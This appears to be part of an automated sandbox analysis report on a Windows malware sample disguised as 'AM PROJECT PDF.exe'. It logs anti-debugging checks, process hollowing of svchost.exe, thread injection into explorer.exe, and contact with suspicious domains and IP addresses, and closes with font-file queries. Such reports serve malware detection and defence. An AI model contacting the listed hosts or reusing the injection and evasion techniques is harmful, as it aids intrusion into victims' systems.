Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011EA537 mov eax, dword ptr fs:[00000030h] 6_2_011EA537
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01187D50 mov eax, dword ptr fs:[00000030h] 6_2_01187D50
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A3D43 mov eax, dword ptr fs:[00000030h] 6_2_011A3D43
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E3540 mov eax, dword ptr fs:[00000030h] 6_2_011E3540
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01213D40 mov eax, dword ptr fs:[00000030h] 6_2_01213D40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118C577 mov eax, dword ptr fs:[00000030h] 6_2_0118C577
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118C577 mov eax, dword ptr fs:[00000030h] 6_2_0118C577
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119FD9B mov eax, dword ptr fs:[00000030h] 6_2_0119FD9B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119FD9B mov eax, dword ptr fs:[00000030h] 6_2_0119FD9B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012305AC mov eax, dword ptr fs:[00000030h] 6_2_012305AC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012305AC mov eax, dword ptr fs:[00000030h] 6_2_012305AC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h] 6_2_01192581
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h] 6_2_01162D8A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h] 6_2_01191DB5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h] 6_2_01191DB5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h] 6_2_01191DB5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011935A1 mov eax, dword ptr fs:[00000030h] 6_2_011935A1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h] 6_2_0122FDE2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01218DF1 mov eax, dword ptr fs:[00000030h] 6_2_01218DF1
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov ecx, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h] 6_2_011E6DC9
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0117D5E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0117D5E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h] 6_2_011E6C0A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h] 6_2_0123740D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h] 6_2_0123740D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h] 6_2_0123740D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119BC2C mov eax, dword ptr fs:[00000030h] 6_2_0119BC2C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FC450 mov eax, dword ptr fs:[00000030h] 6_2_011FC450
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FC450 mov eax, dword ptr fs:[00000030h] 6_2_011FC450
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A44B mov eax, dword ptr fs:[00000030h] 6_2_0119A44B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118746D mov eax, dword ptr fs:[00000030h] 6_2_0118746D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117849B mov eax, dword ptr fs:[00000030h] 6_2_0117849B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012214FB mov eax, dword ptr fs:[00000030h] 6_2_012214FB
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h] 6_2_011E6CF0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h] 6_2_011E6CF0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h] 6_2_011E6CF0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238CD6 mov eax, dword ptr fs:[00000030h] 6_2_01238CD6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118F716 mov eax, dword ptr fs:[00000030h] 6_2_0118F716
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FFF10 mov eax, dword ptr fs:[00000030h] 6_2_011FFF10
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FFF10 mov eax, dword ptr fs:[00000030h] 6_2_011FFF10
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A70E mov eax, dword ptr fs:[00000030h] 6_2_0119A70E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A70E mov eax, dword ptr fs:[00000030h] 6_2_0119A70E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119E730 mov eax, dword ptr fs:[00000030h] 6_2_0119E730
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123070D mov eax, dword ptr fs:[00000030h] 6_2_0123070D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123070D mov eax, dword ptr fs:[00000030h] 6_2_0123070D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01164F2E mov eax, dword ptr fs:[00000030h] 6_2_01164F2E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01164F2E mov eax, dword ptr fs:[00000030h] 6_2_01164F2E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238F6A mov eax, dword ptr fs:[00000030h] 6_2_01238F6A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117EF40 mov eax, dword ptr fs:[00000030h] 6_2_0117EF40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117FF60 mov eax, dword ptr fs:[00000030h] 6_2_0117FF60
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01178794 mov eax, dword ptr fs:[00000030h] 6_2_01178794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h] 6_2_011E7794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h] 6_2_011E7794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h] 6_2_011E7794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A37F5 mov eax, dword ptr fs:[00000030h] 6_2_011A37F5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A61C mov eax, dword ptr fs:[00000030h] 6_2_0119A61C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A61C mov eax, dword ptr fs:[00000030h] 6_2_0119A61C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h] 6_2_0116C600
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h] 6_2_0116C600
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h] 6_2_0116C600
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01198E00 mov eax, dword ptr fs:[00000030h] 6_2_01198E00
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121FE3F mov eax, dword ptr fs:[00000030h] 6_2_0121FE3F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221608 mov eax, dword ptr fs:[00000030h] 6_2_01221608
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116E620 mov eax, dword ptr fs:[00000030h] 6_2_0116E620
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122AE44 mov eax, dword ptr fs:[00000030h] 6_2_0122AE44
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122AE44 mov eax, dword ptr fs:[00000030h] 6_2_0122AE44
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117766D mov eax, dword ptr fs:[00000030h] 6_2_0117766D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h] 6_2_01230EA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h] 6_2_01230EA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h] 6_2_01230EA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FFE87 mov eax, dword ptr fs:[00000030h] 6_2_011FFE87
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E46A7 mov eax, dword ptr fs:[00000030h] 6_2_011E46A7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011936CC mov eax, dword ptr fs:[00000030h] 6_2_011936CC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A8EC7 mov eax, dword ptr fs:[00000030h] 6_2_011A8EC7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121FEC0 mov eax, dword ptr fs:[00000030h] 6_2_0121FEC0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238ED6 mov eax, dword ptr fs:[00000030h] 6_2_01238ED6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011776E2 mov eax, dword ptr fs:[00000030h] 6_2_011776E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011916E0 mov ecx, dword ptr fs:[00000030h] 6_2_011916E0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_011A9910
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.fellyhub.com
Source: C:\Windows\explorer.exe Domain query: www.soraligne.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.194.111 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1130000
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Memory written: C:\Users\user\Desktop\AM PROJECT PDF.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3452
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 0000000D.00000000.336966842.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.319486052.0000000006770000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.369663427.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.303941951.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.397435868.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Users\user\Desktop\AM PROJECT PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
